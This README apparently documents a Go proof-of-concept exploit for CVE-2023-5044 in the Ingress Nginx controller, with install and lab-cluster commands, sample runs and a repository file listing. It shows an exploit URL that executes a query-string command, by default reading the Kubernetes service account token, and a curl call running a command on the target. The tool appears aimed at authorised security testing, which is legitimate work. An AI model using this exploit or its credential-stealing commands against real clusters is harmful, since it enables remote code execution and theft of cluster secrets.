# CVE-2023-5044 Ingress Nginx Exploit Proof-Of-Concept
This is a quick Go program to exploit the recent CVE in the Ingress Nginx controller.
Details on how to do this are already out there via Rory McCune's blog at [https://raesene.github.io/blog/2023/10/29/exploiting-CVE-2023-5044/](https://raesene.github.io/blog/2023/10/29/exploiting-CVE-2023-5044/), this just automates the process a little and tidies up the exploit so that it is a more flexible, generic remote code execution payload.
## Installation
```bash
% go install github.com/4armed/cve-2023-5044@latest
```
## Test Cluster
You will need a cluster to run it against, running a vulnerable version of ingress-nginx (obvs). If you don't have one you're testing against, you can create a Kind cluster by cloning this repo and using the Makefile in the deploy folder.
```bash
% git clone github.com/4armed/cve-2023-5044
% cd cve-2023-5044/deploy && make up
```
If you leave the `kind.yaml` file as-is you'll have a cluster bound to your localhost on port 30080 and 30443.
## Usage
```bash
% cve-2023-5044 run -u http://localhost:30080
2024/01/17 14:10:48 INFO checking permissions
2024/01/17 14:10:48 INFO created ingress object namespace=default name=forearmed-poc-hm48l
2024/01/17 14:10:48 INFO exploit at http://localhost:30080/4armed?cmd=cat+%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken"
```
The "checking permissions" line is because the tool does a Subject Access Review to check you have permissions to create an ingress. If you don't it will exit at that point. If you have edit access to an existing ingress you can certainly use the exploit to achieve a compromise but it's far too complex to automate the updating of an existing ingress without breaking stuff.
The default path to trigger the exploit is `/4armed` and it reads and executes the value of the `cmd` query string parameter.
It will print out an example URL with the default command `cat /var/run/secrets/kubernetes.io/serviceaccount/token`. You can change this with the `-e` flag or just supply a different value in the `cmd` parameter. The exploit isn't hard-coded. You don't need to deploy a new ingress.
```bash
% curl 'http://localhost:30080/4armed?cmd=id'
uid=101(www-data) gid=82(www-data)
```
The ingress object name is randomised using `GenerateName` so pay attention to the output and clean up after yourself.
```bash
% kubectl delete ingress forearmed-poc-hm48l
ingress.networking.k8s.io "forearmed-poc-hm48l" deleted
```
If you just want to generate the ingress object use:
```bash
% cve-2023-5044 generate
```
## Disclaimer
This is for testing purposes only against a cluster for which you have authorisation. If you use it against a cluster, whether you have permission or not, the author does not accept any responsibility for any damage or issues caused. Every care has been take to choose path values which don't conflict with existing ones, you can override these with flags or change the code if needed, but you still might break something. Make sure you know what you are doing.
[4.0K] /data/pocs/38793104765946a141d4944132978911c7d2b6ab
├── [4.0K] cmd
│ ├── [ 992] generate.go
│ ├── [ 773] options.go
│ ├── [1.4K] root.go
│ └── [2.2K] run.go
├── [4.0K] deploy
│ ├── [ 365] kind.yaml
│ ├── [ 181] Makefile
│ └── [ 16K] nginx-ingress.yaml
├── [3.0K] go.mod
├── [ 25K] go.sum
├── [ 34K] LICENSE
├── [ 95] main.go
├── [4.0K] pkg
│ └── [4.0K] poc
│ └── [1.8K] poc.go
└── [3.0K] README.md
4 directories, 13 files